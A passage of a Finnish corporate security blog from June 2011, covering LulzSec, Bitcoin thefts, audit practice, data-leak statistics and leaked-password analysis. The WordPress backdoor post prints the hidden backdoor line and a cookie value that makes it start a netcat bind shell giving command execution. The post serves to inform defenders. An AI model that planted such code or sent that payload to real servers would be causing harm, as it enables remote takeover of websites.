Ads 468x60px

keskiviikko 29. kesäkuuta 2011

KPMG voittajana Hanselin tekninen IT-konsultointi -kilpailutuksessa!

Saimme juuri sen tiedon, jota olemme odottaneet koko kesäkuun. Tulimme valituksi Hanselin teknisen IT-konsultoinnin kilpailutuksessa osa-alueilla:
  • H Tietoturvallisuuskonsultointi
  • F Järjestelmäauditointipalvelut

Tulimme siis valituksi juuri niillä osa-alueilla, joilla halusimmekin tulla valituiksi ja joihin tarjouksemme jätimme. Tarjouksen jätti 22 yritystä tai ryhmittymää. Vertailun perusteella olimme #1.

Osa merkittävimmistä kilpailijoistamme ei tullut valituksi. Tämä voitto tarjoaa meille jälleen hyvän jatkon ja jalansijan julkishallinnon tietoturvakumppanina. Tästä on hyvä jatkaa kohti kesälomaa.

tiistai 28. kesäkuuta 2011

Hollannin tiedustelupalvelun tutkimusraportti vakoiluun liittyvistä riskeistä

Hollannin tiedustelupalvelun (General Intelligence and Security Service of the Netherlands) julkiasema tutkimusraportti on hyvää kesälukemista kaikille, jotka ovat kiinnostuneita erilaisista vakoiluun liittyvistä uhkista ja riskeistä.

Tutkimuksessa keskitytään luonnollisesti Alankomaiden riskeihin, mutta ei ole mitään syytä epäillä ettei samoja riskejä kohdistuisi myös suomalaisiin yrityksiin ja muihin organisaatioihin. Tutkimuksen mukaan mielenkiinto kohdistuu erityisesti:
  • Tietoon ja suunnitelmiin (tietokannat, suunnitelmat ja piirustukset)
  • Strategioihin ja neuvotteluasetelmiin
  • Tulevaisuuden teknologioihin ja infrastruktuuriin

Haluttuja tietoja pyritään saamaan haltuun lähinnä kahdella tavalla; ihmisten kautta ja teknologisia heikkouksia käyttäen. Tutkimuksen perusteella annetaan kolme keskeistä suositusta:
  • Henkilöstön tietoisuutta riskeistä tulee aktiiviseesti lisätä ja tiedon arvoa sekä merkitystä korostaa
  • Turvallisuuden kulttuuria pitää aktiivisesti pyrkiä muuttamaan parempaan suuntaan
  • Kansallisten etujen suojaamiseen tulee kiinnittää huomiota erilaisia säädöksiä ja ohjeita laadittaessa

Suomessa kansallisia etuja on pyritty suojaamaan muun muassa Vahti-ohjeiden, Tietoturvatasovaatimusten ja Katakri-vaatimusten avulla.

Koko tutkimusraportti on saatavissa täältä: https://www.aivd.nl/publish/pages/2111/aivd_analysis_of_vulnerability_to_espionage.pdf

maanantai 27. kesäkuuta 2011

Spekulaatiot LulzSecin lopettamisen syistä vellovat

Ryminällä julkisuuteen ja 50 päivän "purjehduksen" jälkeen matka on ohi. Koska kaikkien tietoisuuteen nousseen hakkeriryhmän lopetus tuli melko yllättäen ja hyvin ei-LulzSec -tyylisesti, on Internet täynnä erilaisia spekulaatioita todellisista lopettamissyistä.

LulzSec on itse ilmoittanut syyksi seuraavaa:
"We're not quitting because we're scared of law enforcement. The press are getting bored of us, and we're getting bored of us."
Myös puheita jäsenten yhdistymisestä toiseen hiljattain pinnalla olleeseen hakkeriryhmittymään, Anonymousiin, on esiintynyt.

LulzSecin tapa käyttää mediaa leikkikenttänään ja perustaen toimintaansa osittain huumoriin ei ole uusi, mutta ryhmittymä vei toimintansa astetta pidemmälle. Selitys median kiinnostuksen vähenemisestä on kuitenkin melko raju. Ryhmä on edelleen saanut huomattavan paljon palstatilaa, eikä kukaan ryhmittymästä varmasti ole voinut olettaa toiminnan olevan päivittäin uutiskynnyksiä rikkovaa. Ja tämä kaikki vain kaksi päivää sen jälkeen, kun ryhmittymä julkaisi itsevarmuutta huokuvan varoituksensa: "2 months of mayhem with more to come."

Joten, puhuvatko LulzSecin jäsenet totta, vai onko lopettamiselle olemassa jokin muu syy? Spekulaatioita riittää aina FBI:n osallisuudesta ryhmän taitojen loppumisesta kesken. Esimerkiksi toinen hakkeriryhmittymä, "A-Team", on kritisoinut kovin sanoin LulzSecin osaamista:

"From what we've seen these lulzsec/gn0sis kids aren't really that good at hacking. They troll the internet and search for sql-injection vulnerabilities as well as Remote File Include/Local File Include bugs. Once found they try to download databases or pull down usernames and passwords. Their releases have nothing to do with their goals or their lulz. It's purely based on whatever they find with their "google hacking" queries and then release it."

Itse asiassa LulzSecin toiminta on ärsyttänyt kyseistä A-Team -ryhmää enemmänkin, jonka johdosta he ovat jäljittäneet LulzSecin jäsenet, osoitteet ja jopa perheenjäsenet sekä julkaisseet ne Internetissä. Voisiko tämä olla todellinen- tai osasyy LulzSecin lopulle? Linkistä löytyy myös muuta mielenkiintoista tietoa, kuten historiaa LulzSecin taustalta.

sunnuntai 26. kesäkuuta 2011

LulzSec lopettanut?

Aamuyöstä antamansa tiedotteen mukaan hakkeriryhmä LulzSec on ilmoittanut seilaavansa purtensa rauhallisemmille vesille. Juhannuksen aikana viimeisinä vuotoinaan he julkaisivat mm. Arizonan poliisin salaisia tiedostoja, AT&T:n sisäistä dataa jne.
Linkki tiedotteeseen: http://pastebin.com/1znEGmHa

perjantai 24. kesäkuuta 2011

Tietoturva-auditoinneista

Auditoinnit suoritetaan yleensä kertaluonteisina tarkastuksina, jotka antavat kuvan kohteen tietoturvasta tarkastushetkellä (ns. point-in-time). Esimerkki tällaisesta on PCI DSS onsite-auditointi, joka suoritetaan kerran vuodessa. Auditoija antaa yhden hetken tilanteen auditointitulosten perusteella raportin auditoidun kohteen vaatimustenmukaisuudesta. Onko mitään takeita siitä, että kohde säilyy vaatimustenmukaisena koko vuoden? Ottaako auditoija ison riskin antaessaan puhtaan lausunnon, kun tietomurto voi tapahtua vaikka seuraavalla viikolla tai seuraavassa kuussa?

Onko sitten järkevää luottaa ns. point-in-time -tarkastukseen? Haavoittuvuuksia ja niiden korjauksia putkahtelee päivittäin eri sovelluksiin, käyttöjärjestelmiin jne. Tokihan mm. PCI DSS on suunniteltu siten, että kontrollit toimivat läpi vuoden, mutta niiden noudattaminen ja vaatimustenmukaisuudesta huolehtiminen on kuitenkin aina organisaation itsensä varassa. Jos auditointiraportti on puoli vuotta vanha, on suurilta osin siihen luottaminen aika kyseenalaista. Lisäksi paljon riippuu auditoinnin suorittaneesta osapuolesta, kuinka hyvin tarkastus on suoritettu ja miten relevantit havainnot on raporttiin löydetty. Ikävä kyllä vanha raportti ei kerro mitään tarkastetun kohteen tietoturvan oikeasta tilasta.

Yksi ratkaisu on käyttää luotetun kolmannen osapuolen suorittamaa varmennusraporttia, joka suoritetaan testaamalla kontrollien toimivuutta puolen vuoden jaksolla. Tällaisten varmennusraporttien pioneeri oli SOX-maailmassa käytetty SAS70 Type 2-lausunto, josta ollaan nyt siirrytty ISAE3402 Type 2 raportointiin. Idea on kuitenkin sama, eli luotettava kolmas osapuoli (yleensä AICPAn, Amerikan KHT-yhdistyksen, hyväksymä taho) suorittaa kontrolliympäristön arvioinnin sekä kontrollien testaamisen puolen vuoden aikana hyvin tarkan varmennusstandardin tiukkojen vaatimusten mukaisesti ja antaa siitä lausunnon jonka allekirjoittaa tarkastusyrityksen ylimpään johtoon kuuluva osakas henkilökohtaisesti. Varmennuslausunto vertautuu tilintarkastuslausuntoon, ja kun tällainen lausunto annetaan ja allekirjoitetaan, on siihen syytä luottaa. ISAE3402 varmennuslausuntoja antavien tahojen riskienhallinnan, laadunvarmistuksen sekä sisäisten auditointimenetelmien tulee vastata AICPAn asettamia vaatimuksia. Kaikille kontrolleille määritellään mm. kriittisyys johon vaikuttaa mm. kontrollin toistuvuus (päivittäin, viikottain, kuukausittain). Kriittisyys taas vaikuttaa tarkastusotoksen kokoon ja niin edelleen.

Koska ISAE3402 on suunniteltu taloudellisen raportoinnin oikeellisuudesta varmistumiseen, on nykyvaatimuksia varten suunniteltu myös täysin uusi varmennusstandardi ISAE3000. ISAE3000:ssa tarkastettava kontrolliympäristö voidaan määritellä vapaammin esim. tietoturvaan tai yksityisyydensuojaan liittyväksi. Esimerkiksi ISAE3000 kontrolliympäristö voi yleisten SOX-IT-kontrollien sijaan sisältää vaikka ISO27001+BS25999+PCI DSS+Katakri -kontrollit, joiden toimivuudesta puolen vuoden ajalta testien tuloksena luotettu taho antaa määrämuotoisen, osakkaan allekirjoittaman lausunnon. ISAE-varmennuslausunnot ovatkin alkaneet nopeasti yleistyä mm. pilvipalveluiden tietoturvan varmistamisessa.

Kumpaan sinä luottaisit? Jatkuvaan auditointiin vai point-in-time auditointiin?


Lähes kaikki yritykset tietovuotojen kohteena?

Ponemon Institute julkaisi yhdessä Juniper Networks-yhtiön kanssa tutkimuksen tietoverkkojen turvallisuudesta. Tutkimus on tehty Yhdysvalloissa.

Kyseisen tutkimuksen mukaan lähes 60% vastaajaorganisaatioista ilmoitti kärsineensä ainakin kahdesta onnistuneesta tietoverkkoon kohdistuneesta hyökkäyksestä/tietovuodosta viimeisen vuoden aikana ja 90% vastaajista ilmoitti kärsineensä ainakin yhdestä onnistuneesta hyökkäyksestä/tietovuodosta.

Nämä luvut vaikuttavat todella suurilta. Tutkimuksesta käy kuitenkin ilmi, että kyse ei ole läheskään aina varsinaisesta murtautumisesta, vaan verkon kautta tapahtuneesta tietojen vuotamisesta vääriin käsiin. Tätä taustaa vasten tulokset vaikuttavat uskottavilta. Yleisimmin tietoja joutui vääriin käsiin etätyöntekijöiden (28%) ja yhteistyökumppaneiden (27%) tiloista ja laitteista. Vaikka tietovuotoja tapahtuikin usein yhteistyökumppanien laitteilta, eivät nämä kumppanit kuitenkaan yleensä itse oleet varsinaisesti tietovuodon takana (vain 8% tapauksista).

Yleisimmin tietoja katosi mobiililaitteiden ja kannettavien sekä pöytätietokoneiden kautta.

Eri tutkimuksissa tietovuotojen määrästä saadaan usein hyvin erilaisia tietoja, mutta yhteistä tutkimuksien tuloksille on kuitenkin ainakin se, että usein tietoja vuotaa loppukäyttäjien laitteiden kautta ja harvemmin palvelimien, tietokantojen yms. kautta, mutta silloin vuotaakin sitten paljon tietoja.

Linkki tutkimukseen: http://www.juniper.net/us/en/local/pdf/additional-resources/ponemon-perceptions-network-security.pdf

keskiviikko 22. kesäkuuta 2011

Takaovia WordPress-blogialustassa

WordPress on julkaissut tiedonannon, jonka mukaan heidän plugin-koodia sisältävästä lähdekoodirepositorystaan on löytynyt useita takaovia ("backdoor"). Hakkerit voivat käyttää takaovia tunkeutuakseen järjestelmiin, jotka käyttävät WordPressia blogialustanaan.

WordPress on blogien luomiseen ja hallinnointiin tarkoitettu avoimen lähdekoodin sisällönhallintaohjelmisto, joka on toteutettu PHP:llä.

Yksi esimerkki takaovesta löytyy WordPressin versionhallinnasta oheisen linkin takaa:

Itse takaovi piilee tässä koodirivissä:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))

Käytännössä yo. takaovea voi käyttää hyväkseen lähettämällä WordPressille evästeen "key", jonka arvoksi on asetettu esim:

#useragent/exec/nc -lp 6667 -e /bin/bash/#

Tämä avaa kohdepalvelimelle netcat-kuuntelijan porttiin 6667. Netcat käynnistää komentokehoteen palvelimelle, kun hyökkääjä ottaa yhteyden ko. porttiin esim. telnetillä. Tämän jälkeen hyökkääjä voi suorittaa palvelimella komentoja web-palvelimen oikeuksin.

WordPress on joutunut vastaavanlaisen hyökkäyksen kohteeksi myös aiemmin tänä vuonna.

Lähde:

tiistai 21. kesäkuuta 2011

Tosi elämän auditointihavaintoja

Kyllä auditointi on mielenkiintoista. Seuraavat havainnot teimme erään tietoturva-auditoinnin yhteydessä.
  • Tietokannan salasana löytyi järjestelmädokumentaatiosta
  • Asiakkaan toimittajan edustajat kertoivat haastatteluissa, että käyttävät yksilöllisiä tunnuksia ylläpitoon. Tekninen testaus osoitti, ettei näin ole
  • Alustassa oli haavoittuvuuksia, joiden avulla järjestelmään voi murtautua (tosin se ei olisi ollut tarpeellista, olihan tietokannan salasana kerrottu dokumentaatiossa)

Monia muitakin havaintoja tietenkin teimme, mutta yllä oleva tosi elämän esimerkki on hyvä muistutus siitä, että auditointia kannattaa tehdä ja että siihen kannattaa sisällyttää:
  • Dokumentaation auditointi
  • Haastattelut (hallinnollinen auditointi)
  • Tekninen testaus

Tällä kombinaatiolla saadaan jo suhteellisen kattava näkemys kohteen tietoturvallisuuden tilasta ja voidaan myös antaa konkreettisia suosituksia puutteiden korjaamiseksi.

Mitkä varmuuskopiot?

Australialainen online-palveluiden tarjoaja Distribute.it joutui lopettamaan toimintansa toistaiseksi hakkereiden "harkitun, kohdistetun ja pahantahtoisen" hyökkäyksen seurauksena. Myöskään suurinta osaa asiakkaiden datasta ei ilmeisesti saada palautettua, koska firma ei ottanut tarvittavia varmuuskopioita.

Tällä hetkellä Distribute.it avustaa asiakkaitaan toiminnan siirtämisessä kilpailijoille. Kaikkiaan firmalla on (oli) 4800 asiakastiliä.

Linkki Distribute.it:n tiedoksiantoon:
http://distributeit.com.au/

maanantai 20. kesäkuuta 2011

Virtuaalivaluutta Bitcoin rajussa vastatuulessa

Aamun uutisissa kerrottiin Bitcoin-järjestelmän romahduksesta. Tällä kertaa Mt Gox -"pörssiin"oli tullut myyntiin niin valtava määrä varastettuja Bitcoineja, että se veti niiden arvon nollaan. Pörssi ajettiin alas ja kaupankäynti keskeytettiin toistaiseksi.

Kaiken lisäksi on tullut tietoon, että Mt Gox-"pörssistä" on viety yli 60.000 käyttäjän henkilötiedot ja salasanahashit. Edellisen aiheeseen liittyvän blogitekstini jälkeenhän on lisäksi ehtinyt jo levitä ensimmäinen Bitcoin-tunnuksia ja lompakkoja varastava haittaohjelma.

Tapahtumasarja ei todellakaan lisää luottamusta uuteen virtuaalivaluuttaan. Vastaavia ongelmia on koko ajan myös oikean rahan käytössä, tiukoista kontrolleista huolimatta. Virtuaalivaluutta kaipaa vielä järeämpiä turvakontrolleja.

Linkit

Uutinen ja mm. kuva Bitcoinin arvonkehityksestä ennen romahdusta The Registerissä:
http://www.theregister.co.uk/2011/06/19/bitcoin_values_collapse_again/

F-Securen blogissa Bitcoin-troijalaisesta:
http://www.f-secure.com/weblog/archives/00002187.html

Analyysiä LulzSec:n vuotamista salasanoista

LulzSec hakkeriryhmä, joka on alkukesän 2011 aikana ollut monen tietomurron takana, julkaisi äskettäin noin 62 000 kaappaamaansa salasanaa. Kyseiset salasanat ovat pääosin erilaisten sähköpostitilien salasanoja.

Rafe Kettler analysoi näiden salasanojen vahvuutta ja sai selville seuraavaa:

123456 oli salasanana 558 kertaa
123456789 oli salasanana 181 kertaa
password oli salasanana 132 kertaa
romance oli salasanana 88 kertaa
102030 oli salasanana 68 kertaa
mystery oli salasanana 67 kertaa
tigger oli salasanana 62 kertaa
shadow oli salasanana 61 kertaa
123 oli salasanana 55 kertaa
ajcuivd289 oli salasanana 55 kertaa
bookworm oli salasanana 54 kertaa
dragon oli salasanana 53 kertaa
sunshine oli salasanana 53 kertaa
reader oli salasanana 52 kertaa
12345 oli salasanana 50 kertaa
purple oli salasanana 50 kertaa
maggie oli salasanana 48 kertaa
reading oli salasanana 47 kertaa
oli salasanana 43 kertaa
1234 oli salasanana 42 kertaa
vampire oli salasanana 34 kertaa
peanut oli salasanana 34 kertaa
angels oli salasanana 34 kertaa
booklover oli salasanana 33 kertaa
michael oli salasanana 32 kertaa

Salasanojen laadusta saatiin selville, että

43,1% sisälsi pelkkiä pieniä kirjaimia
0,4% sisälsi pelkkiä isoja kirjaimia
19,5% sisälsi pelkkiä numeroita
0,1% sisälsi pelkkiä symboleita

Hyviä salasanoja, jotka sisälsivät pieniä ja suuria kirjaimia sekä numeroita ja symboleja oli 36,9%

Tästä voidaa päätellä ainakin että:
  1. ihmiset eivät käytä hyviä salasanoja
  2. kaikki järjestelmät eivät myöskään pakota ihmisiä käyttämään hyviä salasanoja

Muistakaa itse käyttää hyviä salasanoja ja jos salasanasi oli nyt vuodettujen salasanojen joukossa kannattaa se vaihtaa heti.

Alkuperäinen analyysi: http://www.rafekettler.com/2011/06/16/analyzing-the-lulzsec-password-leak/

torstai 16. kesäkuuta 2011

$500.000 virtuaaliryöstö tai sitten ei

Alla olevassa The Registerin artikkelissa kerrotaan henkilöstä, joka väittää häneltä ryöstetyn 13.6.2011 $500.000 arvosta virtuaaliraha Bitcoineja.

Lyhyesti Bitcoineista: ne ovat vertaisverkossa luotavaa virtuaalirahaa, joka luottaa julkisen avaimen salaukseen. Bitcoinien suurimpana etuna on niiden tarjoama täydellinen anonymiteetti, käteisen rahan tapaan.

Artikkeli ja maalaisjärki herättävät mm. seuraavia kysymyksiä:

- Onko rahaa oikeasti ollut tai hävinnyt?
- Oliko rahaa oikeasti $500.000 arvosta?
- Kuka säilyttää oikeasti puolen miljoonan rahakasaa huonosti suojatulla Windows-pc:llä?

Bitcoinin kehittäjät toteavat, että on mahdotonta varmentaa virtuaaliryöstöä ja vaikka ryöstö olisikin tapahtunut, varastetun rahan oikea arvo on todennäköisesti ollut pienempi. Bitcoineilla kun käydään kauppaa ja niiden arvo on korkeimmillaan noteerattu n. $29 arvoiseksi. Nyt varastetun Bitcoin-kasan määrä oli 25.000 kpl. Yhtaikainen 25.000 kpl:een myyntiin laittaminen todennäköisesti romahduttaisi Bitcoinien arvoa "pörssissä". Todennäköisesti jos ja kun henkilöllä on ollut väitetty määrä rahaa digitaalisessa lompakossaan, on sen "hankintahinta" ollut artikkelin mukaan lähempänä tuhatta taalaa.

Joka tapauksessa Bitcoinien ja muiden virtuaalilompakkojen yleistyessä kannattaa harkita järeämpiä turvakontrolleja myös kotiverkkoihin ja -koneisiin. Hyödyntää kannattaa esim. PCI DSS standardin lähestymistapaa:

1) Rakenna turvallinen verkko ja ylläpidä sitä
2) Suojaa tärkeät tiedot salaamalla
3) Käytä vain turvallisia sovelluksia ja haittaohjelmien torjuntaohjelmia ja päivitä niitä säännöllisesti
4) Rajoita käyttöoikeuksia ja pääsyä verkkoon ja sovelluksiin
5) Valvo ja testaa turvallisuutta säännöllisesti.

Linkit

Pidempi artikkeli The Registerissä:
http://www.theregister.co.uk/2011/06/16/bitcoin_theft_claims/
Bitcoin foorumi ja "uhrin" tilitys:
http://bit.ly/lCt0E6
Bitcoin wikipediassa:
http://fi.wikipedia.org/wiki/Bitcoin

Työttömyyskassa vuoti kymmenien henkilötunnukset

Turun-Sanomissa kerrottiin 14.6.2011 että Kaarinalaismies sai postissa 50 henkilötunnusta.
http://www.ts.fi/online/kotimaa/230409.html

Kyseessä oli inhimillinen erehdys, jossa kirjeen mukaan liitettiin epähuomiossa toinen dokumentti. Monesti tietovuotojen taustalla on juuri inhimillinen virhe, ei vättämättä tietomurto tai muu vastaava ulkopuolisen tahon teko. Niitäkin on tosin ollut julkisuudessa viimeaikoina runsaasti.

Tyypillisiä tietovuotojen syitä ovat muun muassa:
  • Dokumenttien väärä hävitystapa
  • Kadonnut/varastettu tietokone (salaamaton)
  • Kadonnut/varastettu USB-muisti (salaamaton)
  • Julkaistu vahingossa nettiin
  • Väärään osoitteeseen toimitettu sähköposti

Lähde: http://datalossdb.org

Tietovuotojen ehkäisy onnistuu tehokkaimmin puuttumalla näihin yleisimpiin tietovuotojen syihin.